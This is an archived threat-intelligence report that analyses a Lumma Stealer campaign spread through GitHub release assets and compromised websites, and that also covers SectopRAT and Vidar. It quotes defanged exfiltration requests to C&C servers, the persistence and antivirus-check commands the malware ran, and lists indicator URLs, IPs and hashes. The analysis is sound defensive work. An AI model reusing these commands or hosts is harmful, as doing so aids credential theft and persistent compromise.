{
	"id": "c00f8db5-fc5d-4a8f-b9fa-a093cc85356a",
	"created_at": "2026-04-06T00:13:08.390836Z",
	"updated_at": "2026-04-10T03:36:47.891026Z",
	"deleted_at": null,
	"sha1_hash": "0d645c4d3da53df7d1923854d03d98668c82db59",
	"title": "Lumma Stealer’s GitHub-Based Delivery Explored via Managed Detection and Response",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1316796,
	"plain_text": "Lumma Stealer’s GitHub-Based Delivery Explored via Managed\r\nDetection and Response\r\nPublished: 2025-01-30 · Archived: 2026-04-05 13:14:26 UTC\r\nSummary\r\nTrend Micro’s Managed XDR team investigated a campaign distributing Lumma Stealer through GitHub, abusing the\r\nplatform's release infrastructure to deliver various malware that included SectopRAT, Vidar, and Cobeacon.\r\nThe attackers used GitHub release infrastructure for initial access, with users downloading files from secure URLs.\r\nThese files exfiltrated sensitive data and connected to external C\u0026C servers, executing commands to avoid detection.\r\nLumma Stealer, along with other malware variants, dropped and executed additional tools, generating multiple\r\ndirectories and staging data. Techniques such as PowerShell scripts and Shell commands were used for persistence\r\nand data exfiltration.\r\nThe tactics, techniques, and procedures used in the incidents display overlap with those used by the Stargazer Goblin\r\ngroup, which is known for using compromised websites and GitHub for payload distribution. Analysis revealed\r\nconsistent URL patterns and compromised legitimate websites for redirection to GitHub-hosted malicious payloads.\r\nProactively implementing security best practices and recommendations will help organizations strengthen their\r\ndefenses against threats like Lumma Stealer. This includes validating URLs and files before downloading, regularly\r\nverifying digital certificates, and using endpoint security solutions that can detect and prevent malicious activities.\r\nIntroduction\r\nTrend Micro™ Managed XDR services uncovered a sophisticated campaign involving Lumma Stealer, an information-stealing malware that was being distributed through GitHub's release infrastructure. The investigation revealed that\r\nmalicious actors exploited GitHub as a trusted platform to deliver the stealer, which subsequently initiated additional\r\nmalicious activities. 
It then downloaded and executed other threats, including SectopRAT (a remote access trojan), Vidar,\r\nCobeacon, and another Lumma Stealer variant.\r\nThe campaign exhibits significant overlaps with tactics attributed to the Stargazer Goblin group, a threat actor that uses\r\ncompromised websites and GitHub repositories for payload distribution. Variations in the infection chain and payload usage\r\nfurther demonstrate the group's adaptability and evolving methods.\r\nThis blog dissects the tactics, techniques and procedures (TTPs) employed in these attacks, highlighting the critical role of\r\ncyber threat intelligence in uncovering the attacker’s strategies.\r\nInitial Access\r\nIn two separate Lumma Stealer cases, we traced the initial access point to file downloads from GitHub’s release\r\ninfrastructure. In one instance, a user downloaded a file named Pictore.exe via the Google Chrome browser, with the URL\r\npointing to a GitHub-hosted release asset stored on a cloud service provider. Similarly, another case we investigated\r\ninvolved the download of App_aeIGCY3g.exe, which was also temporarily hosted through GitHub's release mechanism.\r\nThese incidents showcase the attacker’s tactic of exploiting trusted platforms like GitHub for distributing malicious files.\r\nFigure 1. Downloading the Lumma Stealer binary Pictore.exe from its GitHub repository\r\nBoth files were originally signed by ConsolHQ LTD and Verandah Green Limited (on December 6 and December 12, 2024,\r\nrespectively). 
However, their certificates have since been explicitly revoked by the issuer, signaling that the files are now\r\ndeemed untrustworthy and potentially malicious.\r\nThe GitHub URL strings extracted from the telemetry are as follows:\r\nhttps[:]//objects.githubusercontent[.]com/github-production-release-asset-2e65be/898537481/194f6acb-d420-4d97-b7c1-\r\n01741d4bc184?X-Amz-Algorithm=AWS4-HMAC-SHA256\u0026X-Amz-Credential=releaseassetproduction%2F20241204%2Fus-east-1%2Fs3%2Faws4_request\u0026X-Amz-Date=20241204T193520Z\u0026X-Amz-Expires=300\u0026X-Amz-Signature=80e7a9318067557b21a24d1906ab3f05a5f250eb63dde4dd8a3335908953a46a\u0026X-Amz-SignedHeaders=host\u0026response-content-disposition=attachment%3B%20filename%3DPictore.exe\u0026response-content-type=application%2Foctet-stream\r\nhttps://www.trendmicro.com/en_us/research/25/a/lumma-stealers-github-based-delivery-via-mdr.html\r\nPage 1 of 15\n\nIn this example, the URL provides temporary, secure access to download a file named Pictore.exe from GitHub's release\r\nasset storage, with the X-Amz-Expires parameter indicating that the URL is valid only for a duration of 300 seconds (5\r\nminutes). The use of pre-signed URLs further suggests that the file is part of a release associated with a specific GitHub\r\nrepository, ensuring that the download is authenticated and time-limited.\r\nExecution\r\nWe identified the files Pictore.exe and App_aeIGCY3g.exe as Lumma Stealer, an information-stealing malware designed to\r\nexfiltrate sensitive information—such as credentials, cryptocurrency wallets, system information, and files—while\r\ncommunicating with attacker-controlled servers to facilitate further malicious activities. 
Since both files exhibit the same\r\nbehavior, this blog entry will focus primarily on the data gathered from Pictore.exe.\r\nThe execution of Pictore.exe generates the following files:\r\nnsis7z.dll\r\napp-64.7z\r\nSystem.dll\r\nnse2869.tmp\r\nnsu27DC.tmp\r\nThe dropped file C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Temp\\1\\nse2869.tmp\\nsis7z.dll is a 7zip archiving tool used to\r\nextract files from the archive C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Temp\\1\\nse2869.tmp\\app-64.7z.\r\nFigure 2. The 7zip tool nsis7z.dll extracting the files from app-64.7z.\r\nThe files from the app-64.7z archive are extracted to the directory C:\\Users\\\r\n\u003cusername\u003e\\AppData\\Local\\Temp\\1\\nse2869.tmp\\7z-out\\, which contains Lumma Stealer and its components. These files\r\nsuggest that the malicious executable is either built using Electron (which uses Chromium for rendering) or is itself a\r\nChromium-based application.\r\nElectron apps, by default, bundle Chromium with the app to render the graphical user interface. The use of Chromium\r\nresources like .pak files and V8 snapshots also indicates that the app could be an Electron app.\r\nFigure 3. Extracted files from app-64.7z\r\nWe observed Pictore.exe connecting to two external IP addresses, likely their command-and-control (C\u0026C) servers —\r\n192[.]142[.]10[.]246:80 and 192[.]178[.]54[.]36:443. Meanwhile, App_aeIGCY3g.exe connected to 84[.]200[.]24[.]26 via\r\nport 80.\r\nFigure 4. 
Pictore.exe connecting to external IP addresses\r\nExamining our Trend Vision One™ telemetry, we uncovered the following HTTP requests to the external IP\r\naddresses 192[.]142[.]10[.]246 and 84[.]200[.]24[.]26:\r\nGET hxxp://192[.]142[.]10[.]246/login.php?\r\nevent=init\u0026id=Y3VjdW1iZXI=\u0026data=MTYgR0JfW29iamVjdCBPYmplY3RdX01pY3Jvc29mdCBCYXNpYyBEaXNwbGF5IEFkYXB0ZXJfdHJ1ZV8\r\nGET hxxp://84[.]200[.]24[.]26/login.php?\r\nevent=init\u0026id=dW5kZXJza2lydA==\u0026data=MTYgR0JfW29iamVjdCBPYmplY3RdX01pY3Jvc29mdCBCYXNpYyBEaXNwbGF5IEFkYXB0ZXJfdHJ1\r\n200\r\nThe decoded URL strings result in the following:\r\nhxxp://192[.]142[.]10[.]246/login.php?event=init\u0026id=cucumber=\u0026data=16 GB_[object Object]_Microsoft Basic Display\r\nAdapter_true_1400x1050_Windows 10 Pro_3 minutes (0.06 hours)_C:\\Users\\\u003cusername\u003e_DESKTOP-\r\n\u003ccomputername\u003e_\u003cusername\u003e_Windows_NT_x64_10.0.19044_C:\\Users\\\u003cusername\u003e\\AppData\\Roaming_C:\\Users\\\r\n\u003cusername\u003e\\AppData\\Local\\Temp_DESKTOP-\u003ccomputername\u003e__Intel64 Family 6 Model 85 Stepping 7,\r\nGenuineIntel_AMD64_C:_4_C:\\Users\\\r\n\u003cusername\u003e\\AppData\\Local\\Temp\\2plETWG35EwayNsFpWCMWrwvVrg\\Pictore.exe\r\nGET hxxp://84[.]200[.]24[.]26/login.php?event=init\u0026id=underskirt==\u0026data=16 GB_[object Object]_Microsoft Basic\r\nDisplay Adapter_true_1280x960_Windows 10 Pro_3 minutes (0.06 hours)_C:\\Users\\\u003cusername\u003e_DESKTOP-\r\n\u003ccomputername\u003e_\u003cusername\u003e_Windows_NT_x64_10.0.19044_C:\\Users\\\u003cusername\u003e\\AppData\\Roaming_C:\\Users\\\r\n\u003cusername\u003e\\AppData\\Local\\Temp_DESKTOP-\u003ccomputername\u003e__Intel64 Family 6 Model 85 Stepping 7,\r\nGenuineIntel_AMD64_C:_4_C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Temp\\2pprtBdjzhf5iVtTfAJT5aNsRxD\\Scielfic.exe\r\nThe strings show that the 
malware collected system information, including RAM size, display adapter, OS version,\r\nhostname, uptime, user directory paths, and temporary directory content. It then likely exfiltrated this data to the attacker-controlled servers (192[.]142[.]10[.]246 and 84[.]200[.]24[.]26).\r\nThe following Shell command lines were spawned by Pictore.exe (as well as App_aeIGCY3g.exe): \r\nCommand line Details\r\nPictore.exe --type=utility --utility-sub-type=network.mojom.NetworkService\r\n--lang=en-US --service-sandbox-type=none --user-data-dir=\"C:\\Users\\\r\n\u003credacted\u003e\\AppData\\Roaming\\qfwbhfiixlbsvkug\"\r\n--mojo-platform-channel-handle=2472 --field-trial-handle=1996,i,16339862247624116936,\r\n1579335656413102094,131072 --\r\ndisablefeatures=\r\nSpareRendererForSitePerProcess,\r\nWinRetrieveSuggestionsOnlyOnDemand /prefetch:8\r\nThe command gathers GPU Information such as\r\nVendor ID, device ID, and driver version, among\r\nothers. It disables GPU sandboxing to assist in\r\navoiding detection via security software that\r\nmight monitor GPU processes. It checks the GPU\r\nconfiguration to detect if it is running in a\r\nvirtualized environment (which is common in\r\nsecurity labs and sandboxes).\r\nPictore.exe --type=utility --utility-sub-type=network.mojom.NetworkService\r\n--lang=en-US --service-sandbox-type=none --user-data-dir=\"C:\\Users\\\r\n\u003credacted\u003e\\AppData\\Roaming\\qfwbhfiixlbsvkug\"\r\n--mojo-platform-channel-handle=2472 --field-trial-handle=1996,i,16339862247624116936,\r\n1579335656413102094,131072 --\r\ndisable-features=\r\nSpareRendererForSitePerProcess,\r\nWinRetrieveSuggestionsOnlyOnDemand\r\n/prefetch:8\r\nThe command gathers network-related\r\ninformation, such as service and platform\r\nchannel handles, to establish communication with\r\nmalicious services. It disables certain features to\r\navoid detection and enhance the functionality of\r\nthe Lumma Stealer. 
It configures a custom user\r\ndata directory for storing or staging data. Uses\r\nspecific flags to bypass sandboxing mechanisms\r\nand potentially evade security monitoring tools\r\nPictore.exe --type=gpu-process --user-data-dir=\"C:\\Users\\\r\n\u003credacted\u003e\\AppData\\Roaming\\qfwbhfiixlbsvkug\" --gpu-\r\n\"preferences=UAAAAAAAAADgAAAYAAAAA\r\nAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAA\r\nAAAAAQAAAAAAAAAAAAAAA\r\nAAAAAAAAAABgAAAAAAAAA\r\nGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAA\r\nACAAAAAAAAAA=\r\n--mojo-platform-channel-handle=2000 --field-trial-handle=\r\n1996,i,16339862247624116936,1579335656413102094,131072 --\r\ndisable-features=SpareRendererForSitePerProcess,\r\nWinRetrieveSuggestionsOnlyOnDemand /prefetch:2\r\nThe command gathers GPU preferences to adjust\r\nsystem behavior for evasion, employs a custom\r\nuser-data directory for staging data, and disables\r\nfeatures to bypass detection. The encoded GPU\r\nsettings and platform handles indicate covert\r\ncommunication with attacker-controlled services,\r\nwhile avoiding security software.\r\npowershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -\r\nExecutionPolicy Unrestricted -Command -\r\nThe command launches PowerShell with\r\nunrestricted script execution, prevents loading of\r\nprofiles and logos, keeps the session open for\r\nfurther commands, and allows the execution of\r\nadditional code via the pipeline (often used for\r\nstealthy or malicious activities).\r\nC:\\Windows\\system32\\cmd.exe /d /s /c \"findstr /C:\"Detected boot\r\nenvironment\" \"%windir%\\Panther\\setupact.log\"\"\r\nThe command searches the setupact.log file for\r\nthe phrase \"Detected boot environment\" using the\r\nfindstr command. 
It is typically used to check the\r\nsystem's boot environment during the setup or\r\ninstallation process, potentially to gather\r\ninformation about the system state for\r\nreconnaissance.\r\nC:\\Windows\\system32\\cmd.exe /d /s /c \"echo\r\n%COMPUTERNAME%.%USERDNSDOMAIN%\"\r\nThe command echoes the computer's fully\r\nqualified domain name (FQDN), which is a\r\ncombination of the computer name\r\n(%COMPUTERNAME%) and the DNS domain\r\n(%USERDNSDOMAIN%). It is typically used to\r\ngather information on the system's network\r\nconfiguration, specifically the machine's name\r\nand domain.\r\nC:\\Windows\\system32\\cmd.exe /d /s /c \"chcp\"\r\nThe command sets the active code page number\r\nin the command prompt. It can be used to ensure\r\nthat the malware operates correctly in\r\nenvironments with different regional settings.\r\nTable 1. Shell command lines\r\nSectopRAT, Vidar, and Lumma Stealer\r\nWe discovered that the initial Lumma Stealer files, Pictore.exe and App_aeIGCY3g.exe, dropped various tools and malware\r\nsuch as SectopRAT, Vidar, Cobeacon, and another Lumma Stealer variant on the affected machines. 
These were created\r\nwithin randomly-named (and likely dynamically generated) folders in the temp directory, after which they were\r\nexecuted.\r\nThe following SectopRAT files were created:\r\nC:\\Windows\\system32\\cmd.exe /d /s /c \"\"C:\\Users\\\r\n\u003cusername\u003e\\AppData\\Local\\Temp\\1\\yVUCCXe3c5E4qLcCd4\\PillsHarvest.exe\"\"\r\nC:\\Windows\\system32\\cmd.exe /d /s /c \"\"C:\\Users\\\r\n\u003cusername\u003e\\AppData\\Local\\Temp\\1\\yVUCCXe3c5E4qLcCd4\\BelfastProt.exe\"\"\r\nC:\\Windows\\system32\\cmd.exe /d /s /c \"\"C:\\Users\\\r\n\u003cusername\u003e\\AppData\\Local\\Temp\\cxCzdFWzpj8waIrVyr\\HumanitarianProvinces.exe\"\"\r\nC:\\Windows\\system32\\cmd.exe /d /s /c \"\"C:\\Users\\\r\n\u003cusername\u003e\\AppData\\Local\\Temp\\2pprtBdjzhf5iVtTfAJT5aNsRxD\\Scielfic.exe\"\"\r\nNote that since all the SectopRAT files exhibited the same behavior, we will focus on the file HumanitarianProvinces.exe\r\nfor our analysis.\r\nUpon execution, HumanitarianProvinces.exe generated multiple randomly-named directories within the temp directory\r\nlocated in C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\. The following are some examples of these directories:\r\nNow, Eternal, Pressing, Recommend, Sen, Schema, Openings, Access, Earn, Signup, Cheats, Gift, Silver, Statutory,\r\nReprints, Rwanda, Brain, Advertiser, Inventory, Herald, Restricted, Sheer, Baghdad, Memories, Spent, Fever.\r\nIt then renamed the file Signup to Signup.cmd, changing its extension to .cmd, to enable straightforward execution using the\r\nfollowing commands:\r\nCLI command: \"C:\\Windows\\System32\\cmd.exe\" /c copy Signup Signup.cmd \u0026\u0026 Signup.cmd\r\nThe script includes a command that concatenates multiple files from the temp directory into a single file (t). It appears to\r\ncopy some of the files it drops and checks specific files on the machine. 
The commands combine multiple files into a single\r\nbinary, create directories for staging purposes, introduce delays to evade detection or synchronization, and perform\r\nreconnaissance.\r\nCommand Description\r\nchoice /d y /t 5\r\nAutomatically selects the\r\ndefault option (\"y\") after a 5-\r\nsecond delay.\r\ncmd  /c copy /b ..\\Sen + ..\\Silver + ..\\Reprints + ..\\Cheats + ..\\Gift + ..\\Openings +\r\n..\\Rwanda + ..\\Statutory + ..\\Schema + ..\\Baghdad + ..\\Inventory + ..\\Recommend +\r\n..\\Earn + ..\\Eternal + ..\\Access t\r\nConcatenates the previously\r\ncreated files from parent\r\ndirectories into a single binary\r\nfile named 't' in the current\r\ndirectory.\r\nfindstr /V \"LOCKLANESTHICKCAPTAINSPOTCMSFAVOURITEASSESSED\"\r\nAdvertiser\r\nSearches for lines in the file\r\n‘Advertiser’ that do not\r\ncontain any of the specified\r\nwords/phrases.\r\ncmd /c md 201626\r\nCreates a new directory\r\nnamed 201626 in the current\r\nworking directory.\r\nfindstr \"AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth\"\r\nSearches for the presence of\r\nprocesses or services related\r\nto antivirus or security\r\nsoftware.\r\ntasklist\r\nDisplays a list of currently\r\nrunning processes on the\r\nsystem.\r\nfindstr /I \"wrsa opssvc\"\r\nSearches for case-insensitive\r\nmatches for the terms \"wrsa\"\r\nor \"opssvc\" related to\r\nantivirus or security software.\r\nDenmark.com t\r\nDenmark.com (an AutoIt\r\nscript) executes the binary file\r\n‘t’ created from the\r\nconcatenated files. In other\r\ncases, it was Sports.com,\r\nPrivilege.com, Fabric.com.\r\nTable 2. 
Script commands\r\nCreated directory: C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Temp\\201626\r\nCreated file: C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Temp\\201626\\Denmark.com\r\nThe execution of Denmark.com (AutoIt3.exe) seen in the actions described in these logs indicates a sophisticated attack that\r\naims to conduct data exfiltration, establish persistence, and further compromise target machines. It accomplishes this by\r\ncreating startup entries, copying sensitive information like browser cookies, and using legitimate tools like RegAsm.exe for\r\nprocess injection to connect to the C\u0026C server (91[.]202[.]233[.]18).\r\nGET hxxp://91[.]202[.]233[.]18:9000/wbinjget?q=B2E581C85432BD4DF6A59A00CBDA1CB3\r\nFigure 5. The chain of events in an attack involving SectopRAT\r\nAs displayed in Figure 7, SectopRAT also copied Chrome browser data to the local temp folder\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Local\\Google\\Chrome\\User Data. Malicious actors often copy this data to steal stored\r\ncredentials, session cookies, autofill information, and browsing history to enable account takeover, steal user identities, and\r\nperform further exploitation.\r\nWe also observed persistence being established through the Startup folder. 
The following command creates a .url file\r\n(shortcut) in the Windows Startup folder, ensuring that the shortcut HealthPulse.url runs on startup:\r\ncmd /k echo [InternetShortcut] \u003e \"C:\\Users\\\u003cusername\u003e\\AppData\\Roaming\\Microsoft\\Windows\\Start\r\nMenu\\Programs\\Startup\\HealthPulse.url\" \u0026 echo URL=\"C:\\Users\\\u003cusername\u003e\\AppData\\Local\\WellnessPulse\r\nSolutions\\HealthPulse.js\" \u003e\u003e \"C:\\Users\\\u003cusername\u003e\\AppData\\Roaming\\Microsoft\\Windows\\Start\r\nMenu\\Programs\\Startup\\HealthPulse.url\" \u0026 exit\r\nHealthPulse.url is an internet shortcut file which executes the script HealthPulse.js. In turn, HealthPulse.js employs\r\nActiveX for the execution of the file HealthPulse.scr (an AutoIt file).\r\nFigure 6. Content of the HealthPulse.js script\r\nFigure 7. Content of the HealthPulse.url file\r\nOn some affected machines, SectopRAT created scheduled tasks for persistence. As seen in the following command, a\r\nscheduled task named Lodging is set to execute the script Quantifyr.js every five minutes:\r\ncmd /c schtasks.exe /create /tn \"Lodging\" /tr \"wscript //B 'C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Innovative Analytics\r\nSolutions\\Quantifyr.js'\" /sc minute /mo 5 /F\r\nThe initial actions of the DesignersCrawford.exe file, which we identified as the Vidar malware, are similar to the previously\r\nanalyzed files. This includes the creation of Privilege.com (AutoIt3.exe), which serves as a facilitator for Vidar’s operations,\r\nvia the following command:\r\nprocessCmd: Privilege.com  E\r\nobjectCmd: \"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --remote-debugging-port=9223 --profile-directory=\"Default\"\r\nVidar launches Chrome, first instructing it to start with a specific remote debugging port (9223) enabled, and then to load the\r\ndefault user profile. 
The remote debugging port allows external processes (including attackers) to interact with the browser\r\ninstance.\r\nIt will then access and copy browser data and cloud storage data from Microsoft OneDrive and Discord to\r\nC:\\ProgramData\\S2VKXL68GLN7\\\u003c6 random char\u003e. This includes the following:\r\nDiscord LevelDB files, including data such as user activity, settings, or cached information used by Discord\r\nChrome user data, typically stored in the AppData\\Local\\Google\\Chrome\\User Data folder, and contains profiles,\r\nsession data, and cached files\r\nMicrosoft Edge profile data, including user preferences, cookies, and session data\r\nMozilla Firefox data, including encryption keys used in password storage, other secure data (e.g., certificates), and\r\nbackups.\r\nOneDrive synced files\r\nFigure 8. The chain of events in an attack involving Vidar\r\nWhile the data is being copied, an outbound connection is established to the remote server at 5[.]75[.]212[.]196:443, which\r\nis highly indicative of data exfiltration. This suggests that the attacker may be transferring the stolen information to a remote\r\nserver for further exploitation. Additionally, the system connects to the domain ikores[.]sbs, which is known to be associated\r\nwith Vidar.\r\nFor evasion, it deletes the directory C:\\ProgramData\\S2VKXL68GLN7 and all its content using the command rd /s /q. This\r\ncommand removes the specified directory and its subdirectories without a confirmation prompt, ensuring that any files or\r\ntraces within that folder are silently erased. 
The timeout /t 10 command at the start introduces a 10-second delay, which\r\ncould be used to avoid immediate detection or allow other processes to finish before the clean-up operation is executed.\r\nFinally, the exit command closes the command prompt, completing the process:\r\nCLI command: \"C:\\Windows\\system32\\cmd.exe\" /c timeout /t 10 \u0026 rd /s /q \"C:\\ProgramData\\S2VKXL68GLN7\" \u0026 exit\r\nWe discovered another dropped file ResetEngaging.exe, which we identified as a variant of Lumma Stealer. Like the other\r\ndropped files, ResetEngaging.exe creates a corresponding AutoIt3 file named Fabric.com to facilitate the malware:\r\nCLI command: Fabric.com V\r\nThis command triggers a DNS query to lumdukekiy[.]shop (a domain associated with Lumma Stealer), which allows access\r\nto Chrome’s browser data at C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Google\\Chrome\\User Data. This is done to gather\r\ninformation such as stored credentials, session cookies, autofill information, and browsing history.\r\nIt also creates a PowerShell script (GZ7BLVTR7HDJSNI8Z66BYYANMD.ps1) within the temp directory. This script contains\r\nobfuscated commands that attempt to contact legitimate external domains. These requests seem to serve as connectivity\r\nchecks, possibly ensuring that the compromised system can reach external servers before downloading additional payloads\r\nor receiving further instructions from the attacker's C\u0026C infrastructure.\r\nFigure 9. The chain of events in an attack involving the Lumma Stealer variant\r\nThe script downloads and extracts a ZIP file, which is saved to the temp directory from\r\nhxxps://klipcatepiu0[.]shop/int_clp_sha[.]txt. 
This ZIP file contains executable files, which are subsequently extracted and\r\nexecuted.\r\nInitial access attribution\r\nThe delivery methods observed in this campaign exhibit significant overlap with tactics attributed to the threat group\r\nStargazer Goblin (as outlined in Check Point Research's Atlantida Stealer campaign report from July 2024). While\r\ndistinctions exist in the infection chain order and specific implementation details, several key components are consistent:\r\nCompromised websites: used to deploy malicious PHP scripts for validation and redirection.\r\nGitHub repositories: used as a trusted platform to host and distribute payloads.\r\nRedirect infrastructure: tailored redirection mechanisms are employed to direct victims to malicious content.\r\nAnalysis of downloaded files in VirusTotal reveals an originating URL that the victim interacts with before being redirected\r\nto a malicious GitHub release section. From there, the user is able to download the payload.\r\nFigure 10. App_aeIGCY3g.exe and Pictore.exe download redirection chain\r\nBy analyzing similar files submitted to VirusTotal, we observed a consistent pattern in the originating URL paths. 
Most of\r\nthese paths contained the string page, indicating a potential naming convention employed by the threat actor.\r\nSHA256 Originating URL(s) GitHub release asset\r\nde6fcdf58b22a51d26eacb0e2c992d\r\n9a894c1894b3c8d70\r\nf4db80044dacb7430\r\nhxxps://eaholloway[.]com\r\n/updatepage333\r\nhxxps://github[.]com\r\n/viewfilenow/Downloadnew/|\r\nreleases/download/3214214/Pictore.exe\r\nafdc1a1e1e934f18be28465315704a12\r\nb2cd43c186fbee94\r\nf7464392849a5ad0\r\nhxxps://afterpm[.]com\r\n/pricedpage/ hxxps://github[.]com/down4up/\r\n44/releases/download/\r\n33/App_aeIGCY3g.exe hxxps://enricoborino[.]com\r\n/propage66\r\nb87ff3da811a598c284997222e0b5a\r\n9b60b7f79206f8d795\r\n781db7b2abd41439\r\nhxxp://sacpools[.]com\r\n/pratespage\r\nhxxps://github[.]com/zabdownload/\r\nv14981950815/releases/download/\r\n23113123/Squarel_JhZjXa.exe\r\ncd207b81505f13d46d94b08fb5130dd\r\nae52bd1748856e6b474\r\n688e590933a718\r\nhxxps://startherehosting.net\r\n/todaypage\r\nhxxps://github[.]com/g1lsetup/iln7\r\n/releases/download/\r\n423425325/NanoPhanoTool.exe\r\nhxxps://kassalias[.]com\r\n/pageagain/\r\nhxxps://pmpdm[.]com\r\n/webcheck357\r\n823d37f852a655088bb4a81d2f3a8\r\nbfd18ea4f31e7117e5713\r\naeb9e0443ccd99\r\nhxxps://ageless-skincare[.]com/gn/\r\nhxxp://github[.]com/yesfound/worked\r\n/releases/download/\r\n1/QilawatProtone.exe\r\n380920dfcdec5d7704ad1af1ce35fe\r\nba7c3af1b68ffa4\r\n588b734647f28eeabb7\r\nhxxps://compass-point-yachts[.]com\r\n/nicepage77/pro77.php\r\nhxxps://github[.]com/down7/Settingup\r\n/releases/download/\r\nset/NativeApp_G5L1NHZZ.exe\r\nd8ae7fbb8db3b027a832be6f1acc4\r\n4c7f5aebfdcb306c\r\nd297f7c30f1594d9c45\r\nhxxps://pmpdm[.]com\r\n/webcheck/\r\nhxxps://github[.]com/JF6DEU/vrc121\r\n/releases/download/\r\n2025/X-essentiApp.ex_\r\nhxxps://github[.]com/g1lsetup/v2025\r\n/releases/download/\r\nex/X-essentiApp.exe\r\n15b195152a07bb22fec82aa5c90c7\r\nff44a10c0303446ce\r\n11f683094311a8916b\r\nhxxps://comicshopjocks[.]com\r\n/nicepage/pro.php\r\nhxxps://github
[.]com/dowwnloader\r\n/FileSetup\r\n/releases/download/\r\n124124125/NativeApp_azgEO1k4.exe\r\n800c5cd5ec75d552f00d0aca42bda\r\nde317f12aa797103b93\r\n57d44962e8bcd37a\r\nhxxps://lakeplacidluxuryhomes[.]com\r\n/updatepage/\r\nhxxps://github[.]com/magupdate\r\n/Freshversion10/releases/download/\r\n12315151/NativeApp_01C02RhQ.exe\r\nhxxps://lakeplacidluxuryhomes[.]com\r\n/webpage37/\r\nhxxps://lakeplacidluxuryhomes[.]com\r\n/pagenow/\r\n5550ea265b105b843f6b094979bfa\r\n0d04e1ee2d1607b2e0\r\nd210cd0dea8aab942\r\nhxxps://primetimeessentials[.]com\r\n/newpagyes/\r\nhxxps://github[.]com/kopersparan\r\n/Downloadable\r\n/releases/download/\r\n314/Paranoide.exe\r\n3e8ef8ab691f2d5b820aa7ac80504\r\n4e5c945d8adcfc51ee7\r\n9d875e169f925455\r\nhxxps://razorskigrips[.]com\r\n/newnewpage/\r\nhxxps://github[.]com/mp3andmovies\r\n/installer\r\n/releases/download/\r\nversoin4124/AevellaAi.2.exe\r\nTable 3. Similar files sourced from VirusTotal\r\nThe domains involved in the initial interaction are no longer accessible. However, snapshots from Internet Archive’s\r\nWayback Machine indicate that these were legitimate websites that were active for years, with some dating back to at least\r\n1999. 
These sites were compromised, allowing the threat actor to inject malicious pages and scripts for redirection and\r\nfacilitate the user's navigation to the GitHub-hosted malicious payloads.\r\nThe following files were commonly inserted by the threat actor to aid in the attack chain: an image file, such as\r\n/img/dwn.jpg or /img/download.jpg, which serves as a basic download image, and PHP scripts, such as /pro.php and\r\n/sleep.php, which are likely used to manage redirection or validate user interactions during the attack sequence.\r\nIn addition, we can see from one of the websites that it is built using WordPress, potentially highlighting a common\r\nvulnerability in the group’s exploitation strategy.\r\nFigure 11. One of the compromised websites built using WordPress\r\nMost of the GitHub accounts listed under the \"Originating URL\" section are no longer accessible and were likely taken\r\ndown due to hosting malicious files. However, two accounts remain active and still contain malicious releases:\r\nhxxps://github[.]com/magupdate – joined 12/04/2024\r\nhxxps://github[.]com/yesfound/ – joined 12/11/2024\r\nFigure 12. Malicious GitHub account repository and release name\r\nAn analysis of contribution activity for both accounts reveals minimal and specific actions:\r\nBoth accounts were newly created.\r\nTheir sole activities were creating a repository and releasing a malicious file.\r\nThe repository names used descriptive words followed by a number, and their Readme.md content partially or fully\r\nmirrors the repository name.\r\nFigure 13. 
The Readme.md content of the malicious GitHub repositories\r\nWhile the tactics observed in this campaign closely align with those attributed to the threat group Stargazer Goblin, there are\r\nnotable differences in execution. The infection chain begins with compromised websites that redirect to malicious GitHub\r\nrelease links, using URLs frequently containing the string page, suggesting a deliberate naming convention.\r\nThe compromised domains, with at least one that was built using WordPress, were exploited to host redirection mechanisms,\r\nincluding basic image files and PHP scripts, potentially signaling a recurring vulnerability in the group's exploitation\r\nstrategy.\r\nThe GitHub accounts used in the campaign demonstrate minimal activity and were primarily focused on creating\r\nrepositories and hosting malicious releases. Both accounts exhibit highly specific behavior: creating descriptive repositories\r\nand releases, with the Readme.md content closely matching repository names. Unlike previous campaigns that relied on\r\nestablished GitHub accounts, these accounts show no reputation-building efforts.\r\nThe deployment of multiple malware families—including Lumma Stealer, Vidar, and SectopRAT—in a single infection\r\nreflects tactical evolution aimed at maximizing operational impact. These variations suggest deliberate adjustments by the\r\nthreat actor to evade detection and enhance operational flexibility.\r\nMitigation and recommendations\r\nOrganizations can consider implementing the following examples of threat mitigation best practices to minimize or\r\nprevent malware such as Lumma Stealer from impacting their systems:\r\nValidate URLs and files before downloading and executing them, especially from platforms that can be used to\r\npotentially host malware like GitHub.\r\nCarefully inspect links and attachments in unsolicited emails, even if they appear legitimate. 
Hover over links to\r\ncheck their actual destination before clicking.\r\nRegularly check the validity of digital certificates for executables to ensure they haven't been revoked.\r\nUse endpoint security solutions that can detect and prevent unauthorized execution of shell commands such as those\r\nused by Lumma Stealer for reconnaissance or data exfiltration.\r\nIdentify and block communication with known malicious IP addresses, enforce strict firewall rules to mitigate\r\nC\u0026C communication, and monitor unusual outbound traffic.\r\nTrain employees to recognize phishing emails, malicious websites, and social engineering tactics that may lead to\r\nmalware infections.\r\nConsider partnering with an MDR provider to gain access to specialized expertise and real-time threat detection,\r\nanalysis, and containment capabilities to minimize the impact of infections.\r\nIncorporate threat intelligence into your security posture using tools like Trend Vision One for improved detection\r\nand attribution of attacks to specific threat actors or campaigns.\r\nRegularly patch operating systems, browsers, and third-party applications to close vulnerabilities that could be\r\nexploited during attacks.\r\nEnable Multi-Factor Authentication (MFA) on all accounts. This limits the impact of stolen credentials.\r\nAdopt a zero-trust approach. Implement a “never trust, always verify” philosophy for users, code, links, and third-party integrations to reduce exposure to potential threats.\r\nTrend Vision One\r\nTrend Vision One is a cybersecurity platform that simplifies security and helps enterprises detect and stop\r\nthreats faster by consolidating multiple security capabilities, enabling greater command of the enterprise’s attack 